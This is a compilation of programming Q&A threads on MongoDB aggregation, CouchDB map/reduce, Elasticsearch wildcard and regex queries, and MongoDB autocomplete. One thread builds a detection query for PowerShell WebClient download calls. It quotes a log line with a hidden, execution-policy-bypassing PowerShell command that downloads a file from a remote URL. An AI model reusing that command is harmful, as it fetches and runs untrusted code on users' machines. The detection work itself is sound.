How to get all the substrings matching given word along with their count in mongodb? - regex

I have the following problem retrieving data from MongoDB using spring boot.
Here is my Schema:
class Item
{
#Id
String _id;
String description;
}
Let's say the database has following content:
{"Id1", "carrot vegetable"},
{"Id2", "vegies is a brand"},
{"Id3", "I am Vegetarian"},
{"Id4", "Potato vegetable"},
{"Id5", "Fruits"}
what I'm trying to achieve is get terms which start with "veg" and the count of them.
That is Something like this:
{"vegetable", 2},
{"vegies", 1},
{"vegetarian", 1}
So far, I have came across IndexOfCP operation which can find substring from string.
db.Item.aggregate([ { $match:{ description:/veg/gi } }, { $project:{ index:{ $indexOfCP:[ { $toLower:"$description" }, "veg" ] }, description:1 } }, { $sort:{ index:1 } } ])
But I could not find the matching term and its count in the resultset.
How I can do this in mongo command and in spring boot.

db.Item.aggregate([
{ $match:{ description:/veg/gi } },
{
$project :{
matchedAndUniqWords:{
$reduce:{
input:{ $filter:{input:{$split:[{"$toLower":"$description"}," "]},as:"w",cond:{$ne:[{$indexOfCP:["$$w","veg"]},-1]}}},
initialValue:[],
in:{
$cond:[{$in:["$$this","$$value"]},{$concatArrays:[[],"$$value"]},{$concatArrays:[["$$this"],"$$value"]}]
}
}
}
}
},
{
$unwind:{path : "$matchedAndUniqWords"}
},
{
$group:{_id:"$matchedAndUniqWords",count:{"$sum":1}}
}]);

Related

AWS ElasticSearch Query for Keyword not getting results I expect

I have an ElasticSearch query that looks like:
{
"query": {
"constant_score": {
"filter": {
"bool": {
"should": [
{
"wildcard": {
"Message.keyword": "*System.Net.WebClient).DownloadString(*"
}
},
{
"wildcard": {
"Message.keyword": "*system.net.webclient).downloadfile(*"
}
}
]
}
}
}
}
}
And a Doc in my Index that includes:
message:Engine state is changed from None to Available. Details: NewEngineState=Available PreviousEngineState=None SequenceNumber=13 HostName=ConsoleHost HostVersion=5.1.18362.628 HostId=3dd1a50a-cc15-45e0-bf63-4456d556fb67 HostApplication=powershell.exe -command PowerShell -ExecutionPolicy bypass -noprofile -windowstyle hidden -command (New-Object System.Net.WebClient).DownloadFile('https://drive.google.com/uc?export=download EngineVersion=5.1.18362.628 RunspaceId=de762b62-056c-4be1-90bf-a12cfe6fbc72
As you can see above it includes:
(New-Object System.Net.WebClient).DownloadFile('https:....
It seems like the filter here should be matching the message, but when I execute the Query through Kibana, nothing matches even though I can see the doc above inside my index through Kibana UI if I just query for *.
I think maybe this is because the query above is querying for Message.keyword? How do I get it to successfully hit the document above?
Edit:
mapping: https://pastebin.com/cWN4jF3d
Sample data: https://pastebin.com/SyErqaG8
There are two reasons for the query not returning the result:
The field name in mapping is message whereas in query you are using Message.
A field with keyword datatype index the data as it is. This means it will be case sensitive as well. The document you shared has text System.Net.WebClient).DownloadFile( where you can see that there are characters with upper case whereas the search query you expect to match "*system.net.webclient).downloadfile(*" has all lower case characters.
Therefore the query should be:
{
"query": {
"constant_score": {
"filter": {
"bool": {
"should": [
{
"wildcard": {
"message.keyword": "*System.Net.WebClient).DownloadString(*"
}
},
{
"wildcard": {
"message.keyword": "*System.Net.WebClient).DownloadFile(*"
}
}
]
}
}
}
}
}
The keyword fields are used only for exact match. You will need to match the regular fields if you only want to match a substring / subset of the string, by querying on Message instead of Message.keyword:
{
"query": {
"constant_score": {
"filter": {
"bool": {
"should": [
{
"wildcard": {
"Message": "*System.Net.WebClient).DownloadString(*"
}
},
{
"wildcard": {
"Message": "*system.net.webclient).downloadfile(*"
}
}
]
}
}
}
}
}

mapreduce in couchDB and getting the MAX result after mapreduce

I am a beginner to couchDB.
I have data as below:
one:[{
"name":abc,
"value":1
},
{
"name":efg,
"value":1
},
{
"name":abc,
"value":1
},
I would like to get the count of similar keys and get the maximum.
e.g. in my case "abc" is twice. so the maximum(reduce function) should return
result: {"name":abc,value:2}
Did you try this design document:
{
"_id":"_design/company",
"views":
{
"abc_customers": {
"map": "function(doc) { if (doc.name == 'abc') emit(doc.name,doc.value) }",
"reduce" : "_count"
},
"efg_customers": {
"map": "function(doc) { if (doc.name == 'efg') emit(doc.name,doc.value) }",
"reduce" : "_count"
}
}
}
See this one for a comparison of _count and _sum. Possibly you need _count.
By the above CouchDB design document, you will get count for each doc.name of abc, efg, ... and then you can do a search for max/min of counts.

Using regular expressions in elasticsearch term queries

I want find all items filtered by ID match some regular expression like
*TEST123* //pattern for regexp
So expected result are items
ATEST123001
ATEST123002
ATEST123003
TTTTEST123001
...
I can create some script which scan full storage and save IDs in log-file which can check later. But I want to find some better solution
Updated
I tried
"query" : { "match_all" : { }, "filtered" : { "filter" : { "regexp": { "id":".test123." } } } }, }
I receive
//nested: ElasticsearchParseException[Expected field name but got START_OBJECT \"filtered\"]
When I tried
{
"regexp": {
"id": "test123"
}
}
//Parse Failure [No parser for element [regexp]]]
ES 1.7.4 and Lucene 4.10.4
You can use regular expression queries. The regexp query allows you to use regular expression term queries.
Ref:
https://www.elastic.co/guide/en/elasticsearch/reference/current/query-dsl-regexp-query.html
Sample regex query :
{
"regexp":{
"id": "*test123*"
}
}
Update:
In 2.0 regexp filter has been replaced by regexp query.
{
"query": {
"filtered": {
"filter": {
"regexp":{
"id":".*TEST123.*"
}
}
}
}
}
You can try Query String.
{
"query": {
"query_string": {
"default_field": "if",
"query": "*test123*"
}
}
}

Query Elasticsearch by id using the regex or wildcard filter

I got a list of IDs:
bc2***********************13
b53***********************92
39f***********************bb
eb7***********************7a
80b***********************22
Each * is a unknown char and I need to find all IDs matching these patterns.
I tried the regex filter on field names like id, _id and ID, always with "bc2.*13" (or others) but always got no matches even for existing documents.
By default, _id field is not indexed : that's why you have no results.
Try setting _id field as analyzed in the mapping:
POST /test_id/
{
"mappings":{
"indexed":{
"_id":{
"index":"analyzed"
}
}
}
}
Adding some docs :
PUT /test_id/indexed/bc2***********************13
{
"content":"test1"
}
PUT /test_id/indexed/b53***********************92
{
"content":"test2"
}
I checked with one of your simple regexp query :
POST /test_id/_search
{
"query": {
"regexp": {
"_id": "bc2.*13"
}
}
}
Result :
"hits": {
"total": 1,
"max_score": 1,
"hits": [
{
"_index": "test_id",
"_type": "indexed",
"_id": "bc2***********************13",
"_score": 1,
"_source": {
"content": "test1"
}
}
]
}
Hope this helps :)
If the *'s are of a known and constant length:
bc2.{23}13|b53.{23}92|39f.{23}bb|eb7.{23}7a|80b.{23}22
DEMO
Else:
bc2.*?13|b53.*?92|39f.*?bb|eb7.*?7a|80b.*?22
DEMO2
Use the _uid field and the wildcard query:
GET yourIndex/yourType/_search
{
"query": {
"wildcard": {
"_uid": "bc2***********************13"
}
}
}

Implement auto-complete feature using MongoDB search

I have a MongoDB collection of documents of the form
{
"id": 42,
"title": "candy can",
"description": "canada candy canteen",
"brand": "cannister candid",
"manufacturer": "candle canvas"
}
I need to implement auto-complete feature based on the input search term by matching in the fields except id. For example, if the input term is can, then I should return all matching words in the document as
{ hints: ["candy", "can", "canada", "canteen", ...]
I looked at this question but it didn't help. I also tried searching how to do regex search in multiple fields and extract matching tokens, or extracting matching tokens in a MongoDB text search but couldn't find any help.
tl;dr
There is no easy solution for what you want, since normal queries can't modify the fields they return. There is a solution (using the below mapReduce inline instead of doing an output to a collection), but except for very small databases, it is not possible to do this in realtime.
The problem
As written, a normal query can't really modify the fields it returns. But there are other problems. If you want to do a regex search in halfway decent time, you would have to index all fields, which would need a disproportional amount of RAM for that feature. If you wouldn't index all fields, a regex search would cause a collection scan, which means that every document would have to be loaded from disk, which would take too much time for autocompletion to be convenient. Furthermore, multiple simultaneous users requesting autocompletion would create considerable load on the backend.
The solution
The problem is quite similar to one I have already answered: We need to extract every word out of multiple fields, remove the stop words and save the remaining words together with a link to the respective document(s) the word was found in a collection. Now, for getting an autocompletion list, we simply query the indexed word list.
Step 1: Use a map/reduce job to extract the words
db.yourCollection.mapReduce(
// Map function
function() {
// We need to save this in a local var as per scoping problems
var document = this;
// You need to expand this according to your needs
var stopwords = ["the","this","and","or"];
for(var prop in document) {
// We are only interested in strings and explicitly not in _id
if(prop === "_id" || typeof document[prop] !== 'string') {
continue
}
(document[prop]).split(" ").forEach(
function(word){
// You might want to adjust this to your needs
var cleaned = word.replace(/[;,.]/g,"")
if(
// We neither want stopwords...
stopwords.indexOf(cleaned) > -1 ||
// ...nor string which would evaluate to numbers
!(isNaN(parseInt(cleaned))) ||
!(isNaN(parseFloat(cleaned)))
) {
return
}
emit(cleaned,document._id)
}
)
}
},
// Reduce function
function(k,v){
// Kind of ugly, but works.
// Improvements more than welcome!
var values = { 'documents': []};
v.forEach(
function(vs){
if(values.documents.indexOf(vs)>-1){
return
}
values.documents.push(vs)
}
)
return values
},
{
// We need this for two reasons...
finalize:
function(key,reducedValue){
// First, we ensure that each resulting document
// has the documents field in order to unify access
var finalValue = {documents:[]}
// Second, we ensure that each document is unique in said field
if(reducedValue.documents) {
// We filter the existing documents array
finalValue.documents = reducedValue.documents.filter(
function(item,pos,self){
// The default return value
var loc = -1;
for(var i=0;i<self.length;i++){
// We have to do it this way since indexOf only works with primitives
if(self[i].valueOf() === item.valueOf()){
// We have found the value of the current item...
loc = i;
//... so we are done for now
break
}
}
// If the location we found equals the position of item, they are equal
// If it isn't equal, we have a duplicate
return loc === pos;
}
);
} else {
finalValue.documents.push(reducedValue)
}
// We have sanitized our data, now we can return it
return finalValue
},
// Our result are written to a collection called "words"
out: "words"
}
)
Running this mapReduce against your example would result in db.words look like this:
{ "_id" : "can", "value" : { "documents" : [ ObjectId("553e435f20e6afc4b8aa0efb") ] } }
{ "_id" : "canada", "value" : { "documents" : [ ObjectId("553e435f20e6afc4b8aa0efb") ] } }
{ "_id" : "candid", "value" : { "documents" : [ ObjectId("553e435f20e6afc4b8aa0efb") ] } }
{ "_id" : "candle", "value" : { "documents" : [ ObjectId("553e435f20e6afc4b8aa0efb") ] } }
{ "_id" : "candy", "value" : { "documents" : [ ObjectId("553e435f20e6afc4b8aa0efb") ] } }
{ "_id" : "cannister", "value" : { "documents" : [ ObjectId("553e435f20e6afc4b8aa0efb") ] } }
{ "_id" : "canteen", "value" : { "documents" : [ ObjectId("553e435f20e6afc4b8aa0efb") ] } }
{ "_id" : "canvas", "value" : { "documents" : [ ObjectId("553e435f20e6afc4b8aa0efb") ] } }
Note that the individual words are the _id of the documents. The _id field is indexed automatically by MongoDB. Since indices are tried to be kept in RAM, we can do a few tricks to both speed up autocompletion and reduce the load put to the server.
Step 2: Query for autocompletion
For autocompletion, we only need the words, without the links to the documents.
Since the words are indexed, we use a covered query – a query answered only from the index, which usually resides in RAM.
To stick with your example, we would use the following query to get the candidates for autocompletion:
db.words.find({_id:/^can/},{_id:1})
which gives us the result
{ "_id" : "can" }
{ "_id" : "canada" }
{ "_id" : "candid" }
{ "_id" : "candle" }
{ "_id" : "candy" }
{ "_id" : "cannister" }
{ "_id" : "canteen" }
{ "_id" : "canvas" }
Using the .explain() method, we can verify that this query uses only the index.
{
"cursor" : "BtreeCursor _id_",
"isMultiKey" : false,
"n" : 8,
"nscannedObjects" : 0,
"nscanned" : 8,
"nscannedObjectsAllPlans" : 0,
"nscannedAllPlans" : 8,
"scanAndOrder" : false,
"indexOnly" : true,
"nYields" : 0,
"nChunkSkips" : 0,
"millis" : 0,
"indexBounds" : {
"_id" : [
[
"can",
"cao"
],
[
/^can/,
/^can/
]
]
},
"server" : "32a63f87666f:27017",
"filterSet" : false
}
Note the indexOnly:true field.
Step 3: Query the actual document
Albeit we will have to do two queries to get the actual document, since we speed up the overall process, the user experience should be well enough.
Step 3.1: Get the document of the words collection
When the user selects a choice of the autocompletion, we have to query the complete document of words in order to find the documents where the word chosen for autocompletion originated from.
db.words.find({_id:"canteen"})
which would result in a document like this:
{ "_id" : "canteen", "value" : { "documents" : [ ObjectId("553e435f20e6afc4b8aa0efb") ] } }
Step 3.2: Get the actual document
With that document, we can now either show a page with search results or, like in this case, redirect to the actual document which you can get by:
db.yourCollection.find({_id:ObjectId("553e435f20e6afc4b8aa0efb")})
Notes
While this approach may seem complicated at first (well, the mapReduce is a bit), it is actual pretty easy conceptually. Basically, you are trading real time results (which you won't have anyway unless you spend a lot of RAM) for speed. Imho, that's a good deal. In order to make the rather costly mapReduce phase more efficient, implementing Incremental mapReduce could be an approach – improving my admittedly hacked mapReduce might well be another.
Last but not least, this way is a rather ugly hack altogether. You might want to dig into elasticsearch or lucene. Those products imho are much, much more suited for what you want.
Thanks to #Markus solution, I came up with something similar with aggregations instead. Knowing that map-reduce are flagged as deprecated for later versions.
const { MongoDBNamespace, Collection } = require('mongodb')
//.replace(/(\b(\w{1,3})\b(\W|$))/g,'').split(/\s+/).join(' ')
const routine = `function (text) {
const stopwords = ['the', 'this', 'and', 'or', 'id']
text = text.replace(new RegExp('\\b(' + stopwords.join('|') + ')\\b', 'g'), '')
text = text.replace(/[;,.]/g, ' ').trim()
return text.toLowerCase()
}`
// If the pipeline includes the $out operator, aggregate() returns an empty cursor.
const agg = [
{
$match: {
a: true,
d: false,
},
},
{
$project: {
title: 1,
desc: 1,
},
},
{
$replaceWith: {
_id: '$_id',
text: {
$concat: ['$title', ' ', '$desc'],
},
},
},
{
$addFields: {
cleaned: {
$function: {
body: routine,
args: ['$text'],
lang: 'js',
},
},
},
},
{
$replaceWith: {
_id: '$_id',
text: {
$trim: {
input: '$cleaned',
},
},
},
},
{
$project: {
words: {
$split: ['$text', ' '],
},
qt: {
$const: 1,
},
},
},
{
$unwind: {
path: '$words',
includeArrayIndex: 'id',
preserveNullAndEmptyArrays: true,
},
},
{
$group: {
_id: '$words',
docs: {
$addToSet: '$_id',
},
weight: {
$sum: '$qt',
},
},
},
{
$sort: {
weight: -1,
},
},
{
$limit: 100,
},
{
$out: {
db: 'listings_db',
coll: 'words',
},
},
]
// Closure for db instance only
/**
*
* #param { MongoDBNamespace } db
*/
module.exports = function (db) {
/** #type { Collection } */
let collection
/**
* Runs the aggregation pipeline
* #return {Promise}
*/
this.refreshKeywords = async function () {
collection = db.collection('listing')
// .toArray() to trigger the aggregation
// it returns an empty curson so it's fine
return await collection.aggregate(agg).toArray()
}
}
Please check for very minimal changes for your convenience.